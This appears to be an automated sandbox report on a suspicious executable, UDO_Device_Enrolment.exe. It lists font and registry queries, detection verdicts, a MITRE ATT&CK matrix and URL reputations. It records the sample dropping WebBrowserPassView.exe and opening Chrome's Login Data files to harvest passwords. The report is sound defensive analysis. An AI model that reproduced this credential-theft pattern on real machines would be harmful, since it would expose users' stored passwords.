Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\temp\Windows32\WebBrowserPassView.exe

Code function: 1_2_0041A773 GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,

1_2_0041A773

Source: C:\temp\Windows32\WebBrowserPassView.exe

Code function: 1_2_004192F2 GetVersionExW,

1_2_004192F2

Stealing of Sensitive Information

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: 1.2.WebBrowserPassView.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.WebBrowserPassView.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.WebBrowserPassView.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.WebBrowserPassView.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.WebBrowserPassView.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.266559756.000000000044F000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.267006505.000000000044F000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.266140823.000000000044F000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.267314538.000000000044F000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WebBrowserPassView.exe PID: 3384, type: MEMORYSTR
Source: Yara match	File source: C:\temp\Windows32\WebBrowserPassView.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\temp\Windows32\WebBrowserPassView.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior
Source: C:\temp\Windows32\WebBrowserPassView.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	Path Interception	11 Process Injection	1 Masquerading	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	21 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	111 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	1 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	23 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	21 Obfuscated Files or Information	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	17 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
UDO_Device_Enrolment.exe	40%	ReversingLabs	Win32.Trojan.Generic
UDO_Device_Enrolment.exe	100%	Avira	HEUR/AGEN.1250371
UDO_Device_Enrolment.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\temp\Windows32\WebBrowserPassView.exe	100%	Joe Sandbox ML
C:\temp\Windows32\WebBrowserPassView.exe	81%	ReversingLabs	Win32.Hacktool.PasswordRevealer
C:\temp\Windows32\WebBrowserPassView.exe	43%	Metadefender		Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.UDO_Device_Enrolment.exe.150000.0.unpack	100%	Avira	HEUR/AGEN.1250371		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/(	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/.TTC	0%	URL Reputation	safe
https://render.githubusercontent.com	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/F	0%	URL Reputation	safe
http://www.fontbureau.comlic	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
http://en.w	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.zhongyicts.com.cna	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/(	0%	URL Reputation	safe
